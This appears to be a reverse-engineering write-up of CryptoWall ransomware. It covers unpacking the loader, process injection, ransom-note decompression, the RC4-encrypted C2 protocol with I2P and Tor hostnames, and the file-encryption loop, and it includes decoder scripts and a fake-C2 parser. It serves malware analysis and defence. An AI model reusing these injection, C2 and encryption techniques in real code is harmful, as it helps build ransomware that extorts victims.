Running the file command on the bin executable, we can confirm that this is a PE32 executable (GUI) Intel 80386, for MS Windows. Similar to the analysis we did on the Cozy Bear’s Beacon Loader, we will be using IDA Pro as our flavor of disassembler tools.

Loading the packed executable into our control flow graph view, it becomes apparent fairly quickly that this is packed loader code, and the real CryptoWall code is hiding somewhere within.

Image for post
WinMain CFG View

Checking the resource section of this binary only shows that it has two valid entries; the first one being a size of 91,740 bytes. Maybe we will get lucky and the hidden PE will be here?

Image for post
Dumped resource section

Unfortunately not! This looks like some custom base64 encoded data that will hopefully get used later somewhere down the line in our dissection of the virus. If we scroll down to the end of WinMain() you’ll notice a jump instruction that points to EAX. It will look something like this in the decompiler view:

JUMPOUT(eax=decrypted_code_segment);

Unpacking Binary Loaders

At this point, we have to open up a debugger and view this area of code as it is being resolved dynamically. What you will want to do is set a breakpoint at 0x00402dda, which is the location of the jmp instruction. Once you hit this breakpoint after continuing execution, you’ll notice EAX now points to a new segment of code. Dumping EAX in the disassembler will lead you to the 2nd stage loader. Use the debugger’s step into feature, and our instruction pointer should be safely inside the decrypted loader area.

Image for post
2nd Stage

Let’s go over what is happening at this stage of the malware. The effective address EBP+var_EA6E gets loaded into EDX. EAX then holds the index counter used to step through the next few bytes at data address 302C9AEh.

.data:0302CA46   mov     bl, byte ptr (loc_302C9AE - 302C9AEh)[eax]
.data:0302CA48 add ebx, esi
.data:0302CA4A mov [edx], bl

All this snippet of code is doing is loading bytes from the address mentioned above and storing it at bl (the lower 8 bits of EBX). The byte from bl is then moved into the pointer value of EDX. At the end of this routine EBP+var_EA6E will hold a valid address that gets called as EAX (we can see the line highlighted in red in the image above). Stepping into EAX will now bring us to the third stage of the loading process.

A lot is going on at this point; this function has a couple thousand lines of assembly to go over, so at this point it’s better we open the decompiler view to see what is happening. After resolving some of the strings on the stack, there is some key information that starts to pop up on the resource section we viewed earlier.

pLockRsrc = GetProcAddress(kernel32, &LockResource);
pSizeofResource = GetProcAddress(kernel32, &SizeofResource);
pLoadResource = GetProcAddress(kernel32, &LoadResource);
pGetModuleHandle = GetProcAddress(kernel32, &GetModuleHandleA);
pFindRsrc = GetProcAddress(kernel32, &FindResourceA);
pVirtualAlloc = GetProcAddress(kernel32, &VirtualAlloc);

The malware is loading all functions dynamically that have to do with our resource section. After the data gets loaded into memory, CryptoWall begins its custom base64 decoding technique and then continues to a decryption method as seen below.

Image for post

Most of what is happening here can be explained in a decryptor I wrote that resolves the shellcode from the resource section. If you head over to the python script, you’ll notice the custom base64 decoder is fairly simple. It uses a hardcoded charset and checks whether any of the bytes from the resource section match a byte from the charset; on a match, it breaks from the loop. The next character is decremented by one and compared to zero; if it is greater, the value is taken modulo 256 and the resulting byte is stored in a buffer array. It will perform this in a loop 89,268 times, as that is the size of the encoded string inside the resource section.

Secondary to this, another decryption process starts on our recently decoded data from the algorithm above. Looking at the python script again, we can see that hardcoded XOR keys were extracted in the debugger if you set a breakpoint inside the decryption loop. All that is happening here is each byte is getting decrypted by a rotating three byte key. Once the loop is finished, the code will return the address of the decrypted contents, which essentially just contains an address to another subroutine:

loop:
buffer = *(base_addr + idx) - (*n ^ (&addr + 0xFFE6DF5F + idx));
*(base_addr + idx++) = buffer;

Fourth_Stage_Loader = base_addr;
return (&Fourth_Stage_Loader)(buffer, b64_decoded_str, a1);
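To make the idea of a rotating key concrete, here is a minimal Python sketch of a repeating-key XOR. It is an illustration only: the three key bytes are placeholders (the real ones have to be read out of the debugger), and the decompiled loop above also involves a subtraction, so this is not a drop-in replacement for the sample’s routine.

```python
from itertools import cycle


def rotating_xor(data: bytes, key: bytes) -> bytes:
    """XOR every byte of data with the key, repeating the key as needed."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


# Placeholder key, NOT extracted from the sample.
HYPOTHETICAL_KEY = bytes([0x11, 0x22, 0x33])

# XOR is its own inverse, so the same function encodes and decodes.
encoded = rotating_xor(b"MZ\x90\x00", HYPOTHETICAL_KEY)
decoded = rotating_xor(encoded, HYPOTHETICAL_KEY)
```

Because the key index simply wraps around, the fourth byte is processed with the first key byte again, the fifth with the second, and so on.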

The base_addr transfers data to another variable that we named Fourth_Stage_Loader which holds the address of the newest function, and can be used as a caller. If we dump the address at call dword ptr gs:(loc_1920A1 - 1920A1h)[eax] into memory, you’ll see bytes that start with a generic x86 function prologue like 55 8b ec 81. Dump this to a file, and we can actually emulate this shellcode. In doing so, we don’t have to step through all this code in the debugger; instead it will hopefully tell us how to unpack and get to the main CryptoWall file.

Side note: the python script I wrote will automatically decode & decrypt the resource section, and dump it to a bin file by running => python decrypt_shellcode_loader.py -e.

0x1000: push ebp
0x1001: mov ebp, esp
0x1003: add esp, 0xfffff004
....

An easy way to see what this next stage in the malware’s loader is doing is by using one of my favorite shellcode emulator tools called ScDbg. By using this tool, we can figure out exactly where we need to set our breakpoints in order to get to the main ransomware file. We are going to look for calls such as VirtualAlloc, WriteProcessMemory, CreateProcessA, etc.

C:\> scdbg.exe /s 3200000 /bp WriteProcessMemory /f dump.bin
Loaded 10587 bytes from file extractions/pe_process_injector_dump.bin
Breakpoint 0 set at 7c802213
Initialization Complete..
Max Steps: 3200000
Using base offset: 0x401000
4011cf GetProcAddress(LoadLibraryA)
40165f GetProcAddress(VirtualAlloc)
401c46 GetProcAddress(GetCurrentProcessId)
401c52 GetCurrentProcessId() = 29
...
401d46 CloseHandle(18be)
401f40 VirtualAlloc(base=0 , sz=20400) = 600000
4021e1 VirtualAllocEx(pid=1269, base=400000 , sz=25000) = 621000
/* Breakpoint 0 hit at: 7c802213 */
4021fe WriteProcessMemory(pid=1269, base=400000 , buf=600000, sz=400, written=12fd70)
/* Breakpoint 0 hit at: 7c802213 */
40224e WriteProcessMemory(pid=1269, base=401000 , buf=600400, sz=16400, written=12fd70)

Interesting… it looks like the malware is allocating memory to its own process by using GetCurrentProcessId() and allocating a large enough space to inject a PE file into itself. After memory allocation, CryptoWall injects the payload file twice, once for the header, and the second time for the rest of the file. If you set a breakpoint at WriteProcessMemory, and continue execution twice, you can dump the second argument (ECX) on the stack to see the hidden PE file.

Image for post

There is an Anti-VM trick along the way in the 3rd stage part of the loader process that needs to be patched in order to hit the injection process, so I wrote an x32Dbg python plugin to help automate the patching and dumping operation.

Reversing the Main Crypto Binary

CryptoWall’s entry point starts off by dynamically resolving all imports to obtain all of NTDLL’s offsets by using the process environment block.

Image for post

It will then call a subroutine that is responsible for using the base address of the loaded DLL and uses many hardcoded DWORD addresses to locate hundreds of functions.

Side Note: If you would like to make your life a whole lot easier with resolving the function names in each subroutine, I made a local type definition for IDA Pro over here. The resolving import function table will look a lot cleaner than what you see above:

Image for post

After the function returns, the malware will proceed to generate a unique hash based on your system information. The string that gets MD5 hashed looks like this => DESKTOP-QR18J6QB0CBF8E8Intel64 Family 6 Model 70 Stepping 1, GenuineIntel. After computing the hash, it will set up a handle to an existing named event object with the specified desired access, named \\BaseNamedObjects\\C6B359277232C8E248AFD89C98E96D65.
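As a rough sketch of that fingerprinting step, the snippet below MD5-hashes a system information string and builds the event name from the uppercase digest. The function name is mine, and the ASCII encoding is an assumption: the sample may hash a different byte representation (for example UTF-16), so the digest produced here is not guaranteed to match the one shown above.

```python
import hashlib


def system_fingerprint(system_info: str) -> str:
    """Return the uppercase hex MD5 digest of a system information string.

    Assumption: the string is hashed as plain ASCII bytes.
    """
    return hashlib.md5(system_info.encode("ascii")).hexdigest().upper()


info = "DESKTOP-QR18J6QB0CBF8E8Intel64 Family 6 Model 70 Stepping 1, GenuineIntel"
fingerprint = system_fingerprint(info)

# The event object name is the fixed prefix followed by the digest.
event_name = "\\BaseNamedObjects\\" + fingerprint
print(event_name)
```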

The main engine of the code starts a few routines after the malware checks for system information, events, anti-vm, and running processes.

Image for post

Most of the time the ransomware will successfully inject its main thread into svchost and not explorer, so let’s follow that trail. Since this is a 32-bit binary, it’s going to attempt to find svchost.exe inside of SysWOW64 instead of System32. After successfully locating the full path, it will create a new thread using the RtlCreateUserThread() API call. Once the thread is created, NtResumeThread() will be used on the process to start the ransomware_thread code. Debugging these types of threads can be a little convoluted, and setting breakpoints doesn’t always work.

.text:00416F40     ransomware_thread proc near             
.text:00416F40 start+86↓o
.text:00416F40
.text:00416F40 var_14 = dword ptr -14h
.text:00416F40 var_10 = dword ptr -10h
.text:00416F40 var_C = dword ptr -0Ch
.text:00416F40 var_8 = dword ptr -8
.text:00416F40 var_4 = dword ptr -4
.text:00416F40
.text:00416F40 000 push ebp
.text:00416F41 004 mov ebp, esp
.text:00416F43 004 sub esp, 14h
.text:00416F46 018 call ResolveImportsFromDLL
...

Using x32Dbg, you can set the EIP to address 0x00416F40 since this thread is not resource dependent on any of the other code that has been executed up until this point; this thread even utilizes the ResolveImportsFromDLL function we saw in the beginning of the program’s entry point… meaning, the forced instruction pointer jump will not damage the integrity of the ransomware.

isHandleSet = SetSecurityHandle();
if ( isHandleSet && SetupC2String() )
{
v8 = 0;
v6 = 0;
IsSuccess = WhichProcessToInject(&v8, &v6);
if ( IsSuccess )
{
IsSuccess = StartThreadFromProcess(-1, InjectedThread,
0, 0, 0);
FreeVirtualMemory(v8);
}
}

The thread will go through a series of configurations that involve setting up security attributes, MD5 hashing the hostname of the infected system, and then searching to either inject new code into svchost or explorer. In order to start a new thread, the function WhichProcessToInject will query the registry path, and check permissions on what key values the malware has access to. Once chosen, the InjectedThread process will resume. Stepping into that thread, we can see the module size is fairly small.

.text:00412E80     InjectedThread  proc near               ; DATA 
.text:00412E80
.text:00412E80 000 push ebp
.text:00412E81 004 mov ebp, esp
.text:00412E83 004 call MainInjectedThread
.text:00412E88 004 push 0
.text:00412E8A 008 call ReturnFunctionName
.text:00412E8F 008 mov eax, [eax+0A4h]
.text:00412E95 008 call eax
.text:00412E97 004 xor eax, eax
.text:00412E99 004 pop ebp
.text:00412E9A 000 retn
.text:00412E9A InjectedThread endp

At address 0x00412E83, a subroutine gets called that will bring the malware to start the next series of functions that involves the C2 server configuration callback, and the encryption of files. After the thread is finished executing, EAX resolves a function at offset +0x0A4 which will show RtlExitUserThread being invoked. Once we enter MainInjectedThread, you’ll notice the first function at 0x004011B40 is giving us the first clue of how the files will be encrypted.

.text:00411D06 06C                 push    0F0000000h
.text:00411D0B 070 push 1
.text:00411D0D 074 lea edx, [ebp+reg_crypt_path]
.text:00411D10 074 push edx
.text:00411D11 078 push 0
.text:00411D13 07C lea eax, [ebp+var_8]
.text:00411D16 07C push eax
.text:00411D17 080 call ReturnFunctionName
.text:00411D1C 080 mov ecx, [eax+240h]
.text:00411D22 080 call ecx ; CryptAcquireContext

CryptAcquireContext is used to acquire a handle to a particular key container within a particular cryptographic service provider (CSP). In our case, the CSP being used is the Microsoft Enhanced Cryptographic Provider v1.0, which supports algorithms such as DES, HMAC, MD5, and RSA.

Image for post

Once the CryptoContext is populated, the ransomware will use the MD5 hash created to label the victim’s system information and register it as a key path as such → software\\C6B359277232C8E248AFD89C98E96D65. The ransom note is processed in a few steps. The first step is to generate the TOR addresses, which end up resolving to four addresses: http[:]//torforall[.]com, http[:]//torman2[.]com, http[:]//torwoman[.]com, and http[:]//torroadsters[.]com. These addresses will be injected into the ransomware HTML file later on. Next, the note gets produced by using the NTDLL function RtlDecompressBuffer to decompress the data using COMPRESSION_FORMAT_LZNT1. The compressed ransom note can be found in the .data section and consists of 0x52B8 bytes.

Image for post

Decompressing the note is kind of a mess in python as there is no built in function that is able to do LZNT1 decompression. You can find the actual call at address 0x004087F3.

.text:004087CF 024                 lea     ecx, [ebp+var_8]
.text:004087D2 024 push ecx
.text:004087D3 028 mov edx, [ebp+arg_4]
.text:004087D6 028 push edx
.text:004087D7 02C mov eax, [ebp+arg_6]
.text:004087DA 02C push eax
.text:004087DB 030 mov ecx, [ebp+var_18]
.text:004087DE 030 push ecx
.text:004087DF 034 mov edx, [ebp+var_C]
.text:004087E2 034 push edx
.text:004087E3 038 movzx eax, [ebp+var_12]
.text:004087E7 038 push eax
.text:004087E8 03C call ReturnFunctionName
.text:004087ED 03C mov ecx, [eax+178h]
.text:004087F3 03C call ecx
// Decompiled below
(*(RtlDecompressBuffer))(COMPRESSION_FORMAT_LZNT1,
uncompressed_buffer,
UncompressedBufferSize,
CompressedBuffer,
CompressedBufferSize,
FinalUncompressedSize) )
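Since Python has no built-in LZNT1 support, here is a compact sketch of a decompressor written from the publicly documented LZNT1 chunk format. This is my own minimal version for illustration, not the script referenced in this post, and it does no hardening against malformed input.

```python
import struct


def lznt1_decompress(data: bytes) -> bytes:
    """Decompress an LZNT1 stream (the format used by RtlDecompressBuffer)."""
    out = bytearray()
    pos = 0
    while pos + 2 <= len(data):
        (header,) = struct.unpack_from("<H", data, pos)
        if header == 0:
            break  # an all-zero chunk header terminates the stream
        pos += 2
        # The low 12 bits hold the chunk data length minus one.
        chunk_end = min(pos + (header & 0x0FFF) + 1, len(data))
        if not header & 0x8000:
            # Bit 15 clear: the chunk is stored uncompressed.
            out += data[pos:chunk_end]
            pos = chunk_end
            continue
        chunk_start = len(out)
        while pos < chunk_end:
            flags = data[pos]
            pos += 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:
                    out.append(data[pos])  # literal byte
                    pos += 1
                    continue
                (token,) = struct.unpack_from("<H", data, pos)
                pos += 2
                # The offset/length split of the 16-bit token depends on
                # how much of the current chunk has been produced so far.
                span = len(out) - chunk_start - 1
                extra = 0
                while span >= 0x10:
                    span >>= 1
                    extra += 1
                offset = (token >> (12 - extra)) + 1
                length = (token & (0x0FFF >> extra)) + 3
                for _ in range(length):
                    out.append(out[-offset])  # byte-wise copy, may overlap
    return bytes(out)
```

The back-reference copy is done one byte at a time on purpose: a length greater than the offset is legal and repeats the most recent bytes.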

After the function call, uncompressed_buffer will be a data filled pointer to a caller-allocated buffer (allocated from a paged or non-paged pool) that receives the decompressed data from CompressedBuffer. This parameter is required and cannot be NULL, which is why there is an NtAllocateVirtualMemory() call for this parameter before it is passed to decompression. The script I wrote will grab the compressed data from the PE file, run an LZNT1 decompression algorithm, and then place the buffer in an HTML file. The resulting note will appear on the victim’s system as such:

Image for post

Once the note is decompressed, the HTML fields will be populated with multiple TOR addresses at subroutine sub_00414160(). The note is stored in memory then follows a few more checks before the malware sends its first C2 POST request. Stepping into SendRequestToC2 which is located at 0x00416A50, the first thing we notice is a buffer being allocated 60 bytes of memory.

.text:00416A77 018                 push    3Ch
.text:00416A79 01C call AllocateSetMemory
.text:00416A7E 01C add esp, 4
.text:00416A81 018 mov [ebp+campaign_str], eax

All this information will eventually help us write a proper fake C2 server that will allow us to communicate with the ransomware, since CryptoWall’s I2P servers are no longer active. The function around address 0x004052E0, which we labeled EncryptData_SendToC2, is responsible for taking our generated campaign string and sending it as an initial ping.

Image for post

If you set a breakpoint at this function, you can see what the parameter contains: {1|crypt1|C6B359277232C8E248AFD89C98E96D65}. Once inside this module, you’ll notice three key functions: one responsible for byte swapping, one implementing a key scheduling algorithm, and one doing the actual encryption. The RC4-encrypted output will end up as a hex string:

85b088216433863bdb490295d5bd997b35998c027ed600c24d05a55cea4cb3deafdf4161e6781d2cd9aa243f5c12a717cf64944bc6ea596269871d29abd7e2

Command & Control Communication

The malware sets itself up for a POST request to its I2P addresses that cycle between proxy1-1-1.i2p & proxy2-2-2.i2p. The way this is done is by using the function at 0x0040B880 to generate a random seed based on epoch time, and use that to create a string that ranges from 11 to 16 bytes. This PRNG (Pseudo-Random Number Generator) string will be used as the POST request’s URI and as the key used in the byte swapping function before the RC4 encryption.

Image for post

To give us an example, if our generated string results in tfuzxqh6wf7mng, then after the function call, that string will turn into 67ffghmnqtuwxz. That string gets used for the 256-byte key scheduling algorithm, and the POST request (i.e., http://proxy1-1-1.i2p/67ffghmnqtuwxz). You can find the reverse engineered algorithm here.
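The example pair above is consistent with the byte swapping routine simply sorting the characters in ascending order, so that is what the sketch below assumes (the sample may well get there through a swap-based sort). The RC4 part is the textbook algorithm; whether CryptoWall deviates from it in any detail is not something this snippet proves.

```python
def sort_key(uri: str) -> str:
    """Assumed effect of the byte swapping function: sort characters ascending."""
    return "".join(sorted(uri))


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4: key scheduling over a 256-byte state, then the keystream XOR."""
    state = list(range(256))
    j = 0
    for i in range(256):
        j = (j + state[i] + key[i % len(key)]) % 256
        state[i], state[j] = state[j], state[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + state[i]) % 256
        state[i], state[j] = state[j], state[i]
        out.append(byte ^ state[(state[i] + state[j]) % 256])
    return bytes(out)


uri = "tfuzxqh6wf7mng"
key = sort_key(uri).encode("ascii")
message = b"{1|crypt1|C6B359277232C8E248AFD89C98E96D65}"
ciphertext = rc4(key, message)

# RC4 is symmetric: running it again with the same key restores the input.
assert rc4(key, ciphertext) == message
```

The same rc4() call is what a fake C2 server would use in both directions, since encryption and decryption are the same operation.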

Image for post

The next part will take this byte swapped key, then RC4 encrypt some campaign information that the malware has gathered, which unencrypted, will look like this:

{1|crypt1|C6B359277232C8E248AFD89C98E96D65|0|2|1||55.59.84.254}

This blob consists of the campaign ID, an MD5 hashed unique computer identifier, a CUUID, and the victim’s public IP address. After preparation of this campaign string, the ransomware will begin to resolve the two I2P addresses. Once CryptoWall sends its first ping to the C2 server, the malware expects back an RC4 encrypted string, which will contain a public key used to encrypt all the files on disk. The malware has the ability to decrypt this string using the same RC4 algorithm from earlier, and will parse the info from this block: {216|1pai7ycr7jxqkilp.onion|[pub_key]|US|[unique_id]}. The onion route is for the ransom note, and is a personalized route that the victim can enter using a TOR browser. The site most likely contains further instructions on how to pay the ransom.

Since the C2 servers are no longer active, the parser logic located at 0x00405203 had to be carefully dissected in order to know what our fake C2 server should send back to the malware.

Image for post

In this block, the malware decrypts the data it received from the C2 server. Once decrypted, it stores the first byte in ECX and compares its hex value to 0x7B (char: ‘{’). Tracing this function call to the return value, the string returned will have the brackets removed from the start and end. At memory address 0x00404E69, a DWORD pointer at eax+2ch holds our newly decrypted and somewhat parsed string, which will be checked for a length greater than 0. If the buffer is not empty, we move on to the final processing of this string in the routine at 0x00404B00, which I dubbed ParseC2Data(). This function takes four parameters: char *datain, int datain_size, char *dataout, int dataout_size. The first blob of datain gets parsed up to the first 0x7C (char: ‘|’), which extracts the victim id.

victim_id = GetXBytesFromC2Data(decrypted_block_data_from_c2, &hex_7c, &ptr_to_data_out);

ptr_to_data_out and EAX will now hold an ID number of 216 (we got that number since we placed it there in our fake C2). The next block of code will finish the rest of the data:

while ( victim_id )
{
if ( CopyMemoryToAnotherLocation(&some_buffer_to_copy_too,
8 * idx + 8) )
{
CopyBlocksofMemory(victim_id,
&some_buffer_to_copy_too[2 * idx + 1],
&some_buffer_to_copy_too[2 * idx]);
++idx;
if ( ptr_to_data_out )
{
for ( i = 0; *(i + ptr_to_data_out) == 0x7C; ++i )
{
if (
CopyMemoryToAnotherLocation(&some_buffer_to_copy_too,
8 * idx + 8) )
{
++v9;
++idx;
}
}
}
}
victim_id = GetXBytesFromC2Data(0, &hex_7c_0,
&ptr_to_data_out);
++v5;
++v9;
}

What’s happening here is that on every occurrence of the character ‘|’ we grab the next chunk of data and place it in memory into some type of structure. The data jumps X amount of times per loop until it reaches the last 0x7C byte. It will loop a total of four times. After this function returns, dataout will contain a pointer in memory to this local type, which we reversed to look like this:

struct _C2ResponseData
{
int victim_id;
char *onion_route;
const char* szPemPubKey;
char country_code[2];
char unique_id[4];
};
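The parsing described above boils down to stripping the braces and splitting on ‘|’. A minimal Python sketch of that, useful when building test responses for a fake C2, could look like the following. The class and function names are mine, and the five-field layout is taken from the example response shown earlier.

```python
from dataclasses import dataclass


@dataclass
class C2Response:
    victim_id: int
    onion_route: str
    pem_pub_key: str
    country_code: str
    unique_id: str


def parse_c2_response(decrypted: str) -> C2Response:
    """Strip the surrounding braces and split the five '|' separated fields."""
    if not (decrypted.startswith("{") and decrypted.endswith("}")):
        raise ValueError("response is not wrapped in braces")
    fields = decrypted[1:-1].split("|")
    if len(fields) != 5:
        raise ValueError("expected 5 fields, got %d" % len(fields))
    victim_id, onion_route, pub_key, country, unique_id = fields
    return C2Response(int(victim_id), onion_route, pub_key, country, unique_id)


# Placeholder key and id values, mirroring the example block layout.
parsed = parse_c2_response("{216|1pai7ycr7jxqkilp.onion|PUBKEY|US|abcd}")
```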

Shortly after, there is a check to make sure the victim id is no greater than 0x3E8 (1000) and is not 0xFFFFFFFF (-1 when read as a signed value); if either condition fails, the value falls back to 0x78.

value_of_index = CheckID(*(*parsed_data_out->victim_id));
if ( value_of_index > 0x3E8 || value_of_index == 0xFFFFFFFF )
value_of_index = 0x78;

I believe malware will often perform checks like these while parsing the C2 server’s response to make sure the data being fed back is authentic. Over at 0x00404F35, there is another check to see how many times it has tried to reach the command server. If the count reaches exactly 3, it will move on to check whether the onion route is valid; all CryptoWall variants hardcode the first character of the string as ASCII ‘1’. If the route does not start with this character, the malware will reach out again for a different payload. The other anti-tamper check it makes for the onion route is a CRC32 hash of the payload: if the hashed route does not equal 0x63680E35, the malware will try one last time to compare it against the DWORD value 0x30BBB749. The variant has two hardcoded 256 byte arrays against which it compares the encrypted values. Brute-forcing can take a long time but is possible with a python script that I made here. The checksum is quite simple: it takes each letter of the site string and bitwise-XORs it against an unsigned value:

tmp = ord(site[i]) ^ (ret_value & 0xffffff)

It will take the tmp value and use it as an index into the hardcoded byte array to perform another bitwise XOR:

ret_value = bytes_array[tmp*4:(tmp*4)+4] ^ (0xFFFFFFFF >> 8)
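For comparison, this is what a standard table-driven CRC-32 looks like in Python. The table lookup, the shift by 8 and the final inversion match the shape of the routine described here, but treating the malware’s table as the standard one (reflected polynomial 0xEDB88320) is an assumption on my part; the sample could ship a custom table.

```python
import zlib


def make_crc32_table() -> list:
    """Build the 256-entry lookup table for the reflected polynomial 0xEDB88320."""
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    return table


CRC_TABLE = make_crc32_table()


def crc32(data: bytes) -> int:
    """Standard CRC-32: per-byte table lookup, shift by 8, final inversion."""
    crc = 0xFFFFFFFF
    for byte in data:
        crc = CRC_TABLE[(crc ^ byte) & 0xFF] ^ (crc >> 8)
    return crc ^ 0xFFFFFFFF


# Sanity check against Python's built-in implementation.
assert crc32(b"123456789") == zlib.crc32(b"123456789")
```

If the sample’s table turns out to differ, swapping CRC_TABLE for the 256 DWORDs dumped from the binary is the only change needed.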

The return value then gets inverted, giving us a 4 byte hash to verify against. Now the malware moves on over to the main thread responsible for encrypting the victim’s files at 0x00412988. The first function call in this thread is to CryptAcquireContextW, which will acquire a handle to a particular key container within a CSP. 16 bytes will then be allocated using VirtualAlloc, which will be the buffer for the original key.

isDecompressed = CreateTextForRansomwareNote(0, 0, 0);
if ( !isRequestSuccess || !isDecompressed )
{
remaining_c2_data = 0;
while ( 1 )
{
isRequestSuccess = SecondRequestToC2(&rsa_key,
&rsa_key_size, &remaining_c2_data);
if ( isRequestSuccess )
break;
sleep(0x1388u);
}

Once the text for the ransom note is decompressed, CryptoWall will place this note as an HTML, PNG, and TXT file inside of every directory the virus went through to encrypt documents. After this point, it will go through another round of requests to the I2P C2 servers to request another RSA 2048-bit public key. This key will be the one used for encryption. This strain will do a number of particular hardcoded hash checks on the data it gets back from the C2.

Decoding the Key

CryptoWall will use basic Win32 Crypto functions like CryptStringToBinaryA, CryptDecodeObjectEx, & CryptImportPublicKeyInfo to decode the RSA key returned. Then it will import the public key information into the provider which then returns a handle of the public key. After importing is finished, all stored data will go into a local type structure like this:

struct _KeyData
{
char *key;
int key_size;
BYTE *hash_data_1;
BYTE *hash_data_2;
};
// Gets used here at 0x00412B8C
if ( ImportKey_And_EncryptKey(
cryptContext,
rsa_key,
rsa_key_size,
OriginalKey->key,
&OriginalKey->key_size,
&OriginalKey->hash_data_1,
&OriginalKey->hash_data_2) )
{

The next actions the malware takes are pretty basic for ransomware: it will loop through every available drive, and use GetDriveTypeW to determine whether a disk drive is a removable, fixed, CD-ROM, RAM disk, or network drive. In our case, the C drive is the only open drive, which falls under the category of DRIVE_FIXED. CryptoWall only checks whether the drive is a CD-ROM, because it will not try to spread in that case.

.text:00412C1B      mov     ecx, [ebp+driver_letter]
.text:00412C1E push ecx
.text:00412C1F call GetDriveTypeW
.text:00412C2C cmp eax, 5
.text:00412C2F jz skip_drive

EAX holds the integer value returned from the function call which represents the type of drive associated with that number (5 == DRIVE_CDROM). You can find the documentation here.
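For reference, the return values of GetDriveTypeW and the skip decision made by the comparison above can be written down in a few lines of Python. The constant values come from the Windows headers; the helper name is made up for this sketch.

```python
# Return values of GetDriveTypeW as defined in the Windows headers.
DRIVE_TYPES = {
    0: "DRIVE_UNKNOWN",
    1: "DRIVE_NO_ROOT_DIR",
    2: "DRIVE_REMOVABLE",
    3: "DRIVE_FIXED",
    4: "DRIVE_REMOTE",
    5: "DRIVE_CDROM",
    6: "DRIVE_RAMDISK",
}

DRIVE_CDROM = 5


def should_skip_drive(drive_type: int) -> bool:
    """Mirror of the cmp eax, 5 / jz skip_drive pair: only CD-ROM drives are skipped."""
    return drive_type == DRIVE_CDROM


for value, name in DRIVE_TYPES.items():
    print(name, "skipped" if should_skip_drive(value) else "processed")
```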

The exciting part is near as we are about to head over to where the malware duplicates the key it retrieved from our fake C2 server at address 0x00412C7A. What is happening here is pretty straight forward, and we can show in pseudo-code:

if (OriginalKey)
DuplicatedKey = HeapAlloc(16)
if (DuplicatedKey)
CryptDuplicateKey(OriginalKey, 0, 0, DuplicatedKey)
memcpy(DuplicatedKey, OriginalKey, OriginalKey_size)
CryptDestroyKey(OriginalKey)

Essentially CryptDuplicateKey is making an exact copy of a key and the state of the key. The DuplicatedKey variable ends up becoming a struct: as we can see after the function call at 0x00412C7A, it gets used to store volume information about the drive it’s currently infecting.

GetVolumeInformation(driver_letter, DuplicatedKey + 20);
if ( MoveDriverLetterToDupKeyStruct(driver_letter,
(DuplicatedKey + 16), 0) {
...

That is why 24 bytes were allocated on the heap when creating this variable instead of 16. Now we can define our struct from what we know so far:

struct _DupKey
{
const char *key;
int key_size;
DWORD unknown1;
DWORD unknown2;
char *drive_letter;
LPDWORD lpVolumeSerialNumber;
DWORD unknown3;
};
// Now our code looks cleaner from above
GetVolumeInformation(driver_letter,
&DuplicatedKey->lpVolumeSerialNumber);
if ( MoveDriverLetterToDupKeyStruct(driver_letter,
&DuplicatedKey->drive_letter, 0) {
...

Encrypting of Files

After the malware is finished storing all pertinent information regarding how and where it will do its encryption, CryptoWall moves forward to the main encryption loop at 0x00416780.

Image for post
Encryption Loop Control Flow Graph

As we can see, the control flow graph is fairly long in this subroutine, but nothing out of the ordinary when it comes to ransomware. A lot has to be done before encrypting files. At the start of this function, we see an immediate call to HeapAlloc to allocate 260 bytes of memory. We can safely assume this will be used to store the file’s absolute path, as Windows limits paths to MAX_PATH (260 characters) by default. Upon success, there is also an allocation of virtual memory with a size of 592 bytes, which will be passed to FindFirstFileW as the buffer that receives information about the first file found on the system. The pseudo-code below will explain the flow:

lpFileName = Allocate260BlockOfMemory(); // HeapAlloc
if ( lpFileName )
{
(*(wcscpy + 292))(lpFileName, driver_letter);
...
lpFindFileData = AllocateSetMemory(592); // VirtualAlloc
if ( lpFindFileData )
{
hFile = (*(FindFirstFileW + 504))(lpFileName, lpFindFileData);
if ( hFile != 0xFFFFFFFF )
{
v29 = 0;
do
{
// Continue down to further file actions
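The 592 byte allocation is not an arbitrary number: it matches the size of the WIN32_FIND_DATAW structure that FindFirstFileW fills in. A quick way to check the arithmetic is to lay the structure out with ctypes. Fixed-width types are used here instead of ctypes.wintypes so the result is the same on any platform; the field names follow the Windows SDK definition.

```python
import ctypes


class FILETIME(ctypes.Structure):
    _fields_ = [
        ("dwLowDateTime", ctypes.c_uint32),
        ("dwHighDateTime", ctypes.c_uint32),
    ]


class WIN32_FIND_DATAW(ctypes.Structure):
    _fields_ = [
        ("dwFileAttributes", ctypes.c_uint32),
        ("ftCreationTime", FILETIME),
        ("ftLastAccessTime", FILETIME),
        ("ftLastWriteTime", FILETIME),
        ("nFileSizeHigh", ctypes.c_uint32),
        ("nFileSizeLow", ctypes.c_uint32),
        ("dwReserved0", ctypes.c_uint32),
        ("dwReserved1", ctypes.c_uint32),
        ("cFileName", ctypes.c_uint16 * 260),          # MAX_PATH wide chars
        ("cAlternateFileName", ctypes.c_uint16 * 14),  # 8.3 short name
    ]


# 4 + 3*8 + 4*4 + 260*2 + 14*2 bytes
find_data_size = ctypes.sizeof(WIN32_FIND_DATAW)
print(find_data_size)
```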

Before the malware opens up the first victim file, it needs to make sure the file and file extension themselves are not part of their hardcoded blacklist of bytes. It does this check using a simple CRC-32 hash check. It will take the filename, and extension; compress it down to a DWORD, then compare that DWORD to a list of bytes that live in the .data section.

Image for post

To see how the algorithm works, I reversed it to python code, and wrote my own file checker.

➜  python tor_site_checksum_finder.py --check-file-ext "dll"
[!] Searching PE sections for compressed .data
[!] Searching PE sections for compressed extension .data

[-] '.dll' is not a valid file extension for Cryptowall

➜ python tor_site_checksum_finder.py --check-file-ext "py"
[!] Searching PE sections for compressed .data
[!] Searching PE sections for compressed extension .data

[+] '.py' is a valid file extension for Cryptowall

Now we can easily tell what type of files CryptoWall will attack. Obvious extensions like .dll, .exe, and .sys are very common file types for ransomware to avoid.

Image for post

If the file passes these two checks, then it moves on over to the last part of the equation; the actual encryption located at 0x00412260. We can skip the first few function calls as they are not pertinent to what is about to happen. If you take a look at address 0x00412358, there is a subroutine that takes in three parameters; a file handle, our DuplicateKeyStruct, and a file size. Stepping into the function, we can immediately tell what is happening:

